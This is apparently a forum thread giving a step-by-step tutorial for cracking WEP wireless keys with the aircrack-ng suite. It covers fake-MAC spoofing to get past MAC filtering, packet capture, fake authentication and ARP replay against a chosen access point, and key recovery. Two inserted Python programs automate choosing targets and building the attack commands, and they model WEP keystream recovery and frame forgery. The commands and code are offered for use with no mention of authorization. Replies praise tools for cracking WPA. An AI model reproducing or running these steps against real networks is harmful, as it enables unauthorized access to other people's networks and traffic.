Hey Geeks!

Now, after I've explained how to install aircrack-ng in this thread: http://www.lebgeeks.com/forums/viewtopic.php?id=7542

everyone asks how to use it!?

1- First of all, disconnect your connection.

2- Then open a terminal [Applications > Accessories > Terminal]

and write:
sudo airmon-ng stop wlan0
then write:
sudo ifconfig wlan0 down
then:
sudo macchanger --mac 00:11:22:33:44:55 wlan0
The command above sets a fake MAC address.

then:
sudo airmon-ng start wlan0
then:
sudo airodump-ng wlan0
The command above searches for wireless networks.

The most important things are the BSSID and the CH (channel).

Then write this command:
airodump-ng -c "ch" -w "filename" --bssid "bssid" wlan0
replacing "ch" with the wireless network's channel; the filename can be anything you want. I'll use lebgeeks, so if you pick another name you need to change it in the next commands too.


Example of the edited command:
airodump-ng -c 8 -w lebgeeks --bssid 1C:AF:F7:84:CB:24 wlan0
Then write this command, replacing (bssid) with the network's BSSID:
sudo aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 wlan0
and we wait until the number of packets reaches about 30000.

Then write this command, replacing (bssid) with the network's BSSID:
aircrack-ng -b (bssid) lebgeeks-01.cap
and the key will be cracked :)

For more information:

See this video: http://www.youtube.com/watch?v=6RIUOoMdkv8&feature=related

This only works on WEP networks.

Download Ubuntu: http://www.ubuntu.com/getubuntu/download

the aircrack forums here: http://forum.aircrack-ng.org

Is your card compatible? See this: http://www.aircrack-ng.org/doku.php?id=compatibility_drivers&DokuWiki=2f6f91d3d0e22db32ac23321be8cd875

And you should not use Ctrl + C when copying commands, because that may affect the program.

And when there is a command and you can't type it, just open a new terminal and type it there :)

Sorry for my bad English :)

Best Regards / ShekvaL
Command Explanations:
sudo apt-get install macchanger          # MAC address changer, used for the fake MAC
sudo apt-get install aircrack-ng         # the aircrack-ng suite (airmon-ng, airodump-ng, aireplay-ng, aircrack-ng)

sudo airmon-ng stop wlan0                # leave monitor mode if it was already on
sudo ifconfig wlan0 down                 # the interface must be down to change its MAC
sudo macchanger --mac 00:11:22:33:44:55 wlan0   # set the fake MAC
sudo airmon-ng start wlan0               # put the card in monitor mode (some drivers create a mon0 interface for this)
sudo airodump-ng wlan0                   # scan: note the target's BSSID and channel
sudo airodump-ng -c [channel] -w [filename] --bssid [bssid] wlan0   # capture only that AP; writes [filename]-01.cap and [filename]-01.csv
sudo aireplay-ng -1 0 -a [bssid] -h [fake mac] mon0     # fake authentication with the AP (use the same interface as the capture, wlan0 or mon0)
sudo aireplay-ng -3 -b [bssid] -h [fake mac] wlan0      # ARP request replay, makes the AP generate new IVs much faster
aircrack-ng -b [bssid] [filename]-01.cap                # crack the WEP key from the captured IVs
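The step the tutorial leaves vague is "wait until the number of packets reaches about 30000". airodump-ng writes a CSV next to the .cap (lebgeeks-01.csv with the command above) that holds exactly the numbers you need: the "# IV" column per access point and the station table that shows which client MACs are associated with which BSSID. The following Python helper is an added example, not code from this thread or from the aircrack-ng project: it parses that CSV, lists the WEP networks with their channel and BSSID, checks the IV count against the 30,000 (PTW) and 500,000 (older attack, 104-bit key) figures quoted later in this thread, shows the associated clients (after a successful aireplay-ng -1 fake authentication your own fake MAC should appear there), and builds the follow-up commands with the BSSID and channel validated before you paste them. The CSV rows are constructed; the column layout is the one airodump-ng writes. The interface name wlan0 is an assumption taken from the tutorial; some drivers create mon0 instead.

```python
import csv
import io
import re

# Rules of thumb quoted in the thread, not hard limits: PTW (aircrack-ng -z) usually
# works with tens of thousands of IVs; the older statistical attack needs far more.
IVS_NEEDED_PTW = 30_000
IVS_NEEDED_KOREK_104 = 500_000
MAC_RE = re.compile(r"^([0-9A-F]{2}:){5}[0-9A-F]{2}$")

# Constructed sample in the column layout airodump-ng writes to <prefix>-01.csv:
# an access-point table, a blank line, then the station (client) table.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
1C:AF:F7:84:CB:24, 2011-01-15 20:01:02, 2011-01-15 20:12:45,  8,  54, WEP , WEP, OPN, -45,  1203,  31250,   0.  0.  0.  0,   8, lebgeeks, 
00:1D:7E:AA:BB:CC, 2011-01-15 20:01:05, 2011-01-15 20:12:44,  6,  54, WPA2, CCMP, PSK, -60,   980,      0,   0.  0.  0.  0,   6, office, 
00:0C:42:11:22:33, 2011-01-15 20:01:09, 2011-01-15 20:12:40, 11,  11, WEP , WEP, SKA, -72,   455,   4120,   0.  0.  0.  0,   5, guest, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:11:22:33:44:55, 2011-01-15 20:02:10, 2011-01-15 20:12:40, -30,  29870, 1C:AF:F7:84:CB:24, lebgeeks
00:16:EA:12:34:56, 2011-01-15 20:03:00, 2011-01-15 20:12:30, -55,   1210, 00:1D:7E:AA:BB:CC, 
"""


def _rows(section):
    """Parse one CSV table (header line first) into dicts with stripped cells."""
    header, rows = None, []
    for cells in csv.reader(io.StringIO(section), skipinitialspace=True):
        cells = [c.strip() for c in cells]
        if not any(cells):
            continue                                # blank separator line
        if header is None:
            header = cells
        else:                                       # probed-ESSID lists can hold commas
            if len(cells) > len(header):
                cells = cells[:len(header) - 1] + [",".join(cells[len(header) - 1:])]
            rows.append(dict(zip(header, cells)))
    return rows


def parse_airodump_csv(text):
    """Split <prefix>-01.csv into (access points, stations)."""
    lines = text.splitlines()
    cut = next((i for i, l in enumerate(lines) if l.startswith("Station MAC")), len(lines))
    return _rows("\n".join(lines[:cut])), _rows("\n".join(lines[cut:]))


def wep_targets(aps):
    """Only WEP networks are attackable this way; WPA/WPA2 rows are skipped."""
    return [ap for ap in aps if ap["Privacy"].startswith("WEP")]


def iv_progress(ap, ptw=True):
    """(captured IVs, IVs needed, enough?) for the chosen aircrack-ng mode."""
    captured = int(ap["# IV"])
    needed = IVS_NEEDED_PTW if ptw else IVS_NEEDED_KOREK_104
    return captured, needed, captured >= needed


def associated_stations(stations, bssid):
    """Client MACs seen associated with this AP; your fake MAC should show up here after aireplay-ng -1."""
    return [s["Station MAC"] for s in stations if s["BSSID"] == bssid]


def capture_commands(ap, prefix, iface="wlan0", fake_mac="00:11:22:33:44:55"):
    """The thread's follow-up commands for one AP, with BSSID and channel validated
    first. iface is an assumption: depending on the driver, 'airmon-ng start' may
    create mon0 instead of using wlan0."""
    bssid, ch = ap["BSSID"].upper(), int(ap["channel"])
    if not MAC_RE.match(bssid):
        raise ValueError(f"bad BSSID: {bssid!r}")
    if not 1 <= ch <= 14:
        raise ValueError(f"bad 2.4 GHz channel: {ch}")
    return [
        f"airodump-ng -c {ch} -w {prefix} --bssid {bssid} {iface}",
        f"aireplay-ng -1 0 -a {bssid} -h {fake_mac} {iface}",
        f"aireplay-ng -3 -b {bssid} -h {fake_mac} {iface}",
        f"aircrack-ng -b {bssid} {prefix}-01.cap",
    ]


def report(text):
    """One status line per WEP access point in the capture."""
    aps, stations = parse_airodump_csv(text)
    out = []
    for ap in wep_targets(aps):
        got, need, ok = iv_progress(ap)
        out.append(f"{ap['ESSID']} ({ap['BSSID']}, ch {ap['channel']}): {got}/{need} IVs, "
                   f"{'run aircrack-ng' if ok else 'keep injecting'}; "
                   f"clients: {associated_stations(stations, ap['BSSID']) or 'none'}")
    return out


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_CSV)))
    target = wep_targets(parse_airodump_csv(SAMPLE_CSV)[0])[0]
    print("\n".join(capture_commands(target, "lebgeeks")))
```

Point it at the real file with report(open("lebgeeks-01.csv").read()) while airodump-ng is still running; the CSV is rewritten periodically, so the IV count goes up as aireplay-ng -3 replays ARP requests. If the station table never shows your fake MAC against the target BSSID, the fake authentication did not take and the replay will not produce IVs.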
Thanks for posting. However, your tutorial still lacks a lot of information.

It would be nice if you could explain what each of these commands do. Without necessarily going into the basics of computer networking, you should still explain more.

Like for example:

1- Why do you need a fake mac?
2- Why do you wait for 30 000 packets?
3- What is the role of each of the tools you're using (airodump, aireplay-ng, airmon)?

It'd be nice if you have the time to complete your tutorial so we could have something finished to use as a reference.
I am not surprised that WEP is hackable. The WEP algorithm itself has a bug and is not secure. Use WPA or WPA2, people!
rahmu wrote:
Thanks for posting. However, your tutorial still lacks a lot of information.

It would be nice if you could explain what each of these commands do. Without necessarily going into the basics of computer networking, you should still explain more.

Like for example:

1- Why do you need a fake mac?
2- Why do you wait for 30 000 packets?
3- What is the role of each of the tools you're using (airodump, aireplay-ng, airmon)?

It'd be nice if you have the time to complete your tutorial so we could have something finished to use as a reference.
1- Sometimes you fail to associate with the AP because MAC filtering is enabled; then you should try to use a fake MAC address.

2- Cracking the key depends on receiving the largest number of packets, and it depends on the access point itself: for some, 3000 packets are enough, some need more, but 30000 is only to make sure that we have the right number.

3- airodump: grabbing IVs
- aireplay: packet injector to attack APs.

Thanks to Google :P :

- airodump: is a packet capture tool for aircrack-ng. It allows dumping packets directly from a WLAN interface and saving them to a pcap or IVs file.

- aireplay: is used for re-injecting wireless 802.11 frames on the specified channel. The main aim of aireplay-ng is to generate a large amount of traffic so that it can be used later for cracking the WEP or WPA-PSK keys with the help of aircrack-ng. The input to aireplay-ng will be either the pcap file which needs to be injected or the interface name, as aireplay-ng is even capable of capturing packets on the wireless interface.

- airmon: is a simple and easy-to-use tool and is part of the aircrack-ng suite of products. aircrack-ng is a set of tools for auditing wireless networks. These tools automate the steps involved in WEP cracking, from setting the interface in monitor mode to sniffing packets, re-injecting packets, examining these packets against different attack vectors, cracking the WEP key and finally decrypting the WEP-encrypted packets. airmon-ng automates the first step, i.e. setting the interface into monitor mode.

The enabling step for WEP cracking is the ability to sniff wireless packets and to inject wireless packets. By sniffing wireless packets one can discover wireless devices like APs and clients and their associations, and by injecting wireless packets the whole WEP cracking process can be accelerated by orders of magnitude. For both of these operations you need to put your interface in monitor mode. There are elaborate commands provided by every driver for setting the interface in monitor mode. airmon-ng automates the process of putting the interface into monitor mode.
Note that some wireless cards do not support packet injection...
rahmu wrote:
Thanks for posting. However, your tutorial still lacks a lot of information.

It would be nice if you could explain what each of these commands do. Without necessarily going into the basics of computer networking, you should still explain more.

Like for example:

1- Why do you need a fake mac?
2- Why do you wait for 30 000 packets?
3- What is the role of each of the tools you're using (airodump, aireplay-ng, airmon)?

It'd be nice if you have the time to complete your tutorial so we could have something finished to use as a reference.
1- You will bypass the restriction if MAC filtering is there, and you will hide yourself in case the network is monitored.

2- 30,000 packets is only enough if you are using aircrack's -z mode (PTW attack); otherwise you need at least 500,000 vectors (IVs), and that is for a 104-bit key.

3- Explained.
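Two of the answers above, that "the WEP algorithm itself has a bug" and that the attack needs tens or hundreds of thousands of IVs, can be shown with a small model rather than just stated. The following is an added example, not code from this thread or from aircrack-ng: a pure-Python RC4 and WEP frame encryption (IV || key seeds RC4, CRC-32 ICV, IV sent in clear), used to show that reusing the 24-bit IV leaks the XOR of two plaintexts, that a known header (the LLC/SNAP header every ARP frame starts with) gives away that IV's keystream without the key, that recovered keystream lets an attacker forge a frame whose ICV still checks out, and how quickly a random 24-bit IV repeats. The key, IV and payloads are constructed. aircrack-ng's PTW and KoreK modes recover the key itself from statistical biases in RC4 across many distinct IVs, which this toy does not implement; the keystream recovery and forgery shown here are the flaws that aireplay-ng's chopchop/fragmentation attacks and packetforge-ng rely on.

```python
import math
import struct
import zlib


def xor(a, b):
    """XOR two byte strings, truncated to the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


def rc4_keystream(key, n):
    """RC4 key scheduling, then n bytes of keystream. WEP seeds it with IV||key."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def icv(data):
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key, iv, plaintext, key_id=0):
    """WEP frame body: IV(3) | key-id byte | (plaintext || ICV) xor RC4(iv||key)."""
    ks = rc4_keystream(iv + key, len(plaintext) + 4)
    return iv + bytes([key_id << 6]) + xor(plaintext + icv(plaintext), ks)


def wep_decrypt(key, frame):
    """Return (plaintext, icv_ok) for a frame body produced by wep_encrypt."""
    iv, body = frame[:3], frame[4:]
    pt = xor(body, rc4_keystream(iv + key, len(body)))
    data, tag = pt[:-4], pt[-4:]
    return data, icv(data) == tag


def keystream_reuse_leak(frame_a, frame_b):
    """Same IV => same keystream: XOR of the ciphertexts is plaintext_a XOR plaintext_b."""
    if frame_a[:3] != frame_b[:3]:
        raise ValueError("frames use different IVs")
    return xor(frame_a[4:], frame_b[4:])


def recover_keystream(frame, known_prefix):
    """Known plaintext (the LLC/SNAP header of every ARP frame) reveals that IV's keystream."""
    return xor(frame[4:4 + len(known_prefix)], known_prefix)


def forge_frame(iv, keystream, payload):
    """Encrypt a chosen payload under a recovered keystream; CRC-32 is not a MAC, so the ICV passes."""
    if len(payload) + 4 > len(keystream):
        raise ValueError("not enough keystream for payload plus ICV")
    return iv + b"\x00" + xor(payload + icv(payload), keystream)


def iv_collision_probability(frames, iv_bits=24):
    """Birthday bound: chance that some IV repeats after `frames` uniformly random IVs."""
    return 1 - math.exp(-frames * (frames - 1) / (2 * 2 ** iv_bits))


# Constructed demo data: a 40-bit key, one IV, two equal-length ARP-like frames.
KEY = bytes.fromhex("1122334455")
IV = bytes.fromhex("0a0b0c")
LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")      # LLC/SNAP + ethertype ARP
PLAIN_A = LLC_SNAP_ARP + bytes.fromhex("0001080006040001") + b"A" * 20
PLAIN_B = LLC_SNAP_ARP + bytes.fromhex("0001080006040002") + b"B" * 20


def demo():
    """Run the whole scenario and return which properties held."""
    frame_a = wep_encrypt(KEY, IV, PLAIN_A)
    frame_b = wep_encrypt(KEY, IV, PLAIN_B)           # same IV reused: the flaw
    ks = recover_keystream(frame_a, LLC_SNAP_ARP)     # 8 keystream bytes, no key
    leak = keystream_reuse_leak(frame_a, frame_b)
    return {
        "roundtrip_ok": wep_decrypt(KEY, frame_a) == (PLAIN_A, True),
        "leak_is_plaintext_xor": leak[:len(PLAIN_A)] == xor(PLAIN_A, PLAIN_B),
        "keystream_recovered": ks == rc4_keystream(IV + KEY, len(ks)),
        "other_frame_header_read": xor(frame_b[4:12], ks) == PLAIN_B[:8],
        "forged_frame_accepted": wep_decrypt(KEY, forge_frame(IV, ks, b"ping")) == (b"ping", True),
        "p_iv_repeat_after_5000": iv_collision_probability(5000),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The collision figure is the reason the 24-bit IV is too short: with random IVs there is roughly an even chance of a repeat after about 5,000 frames, and many cards simply count the IV up from zero, so repeats are guaranteed across reboots. The key recovery that aircrack-ng actually performs needs many distinct IVs, which is why the tutorial waits for the "# IV" counter instead of cracking straight away.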
10 months later
I recently installed aircrack-ng on Mint, but I'm having a fixed channel problem whenever I use aireplay-ng to do a fake authentication with the AP. Any idea how to solve this problem? I'm using an RTL8187 chipset.
Thanks in advance :)
WPA is hackable with BackTrack :)
lorcan32 wrote:
WPA is hackable with BackTrack :)
I use Gerix. It has a lovely user interface too :)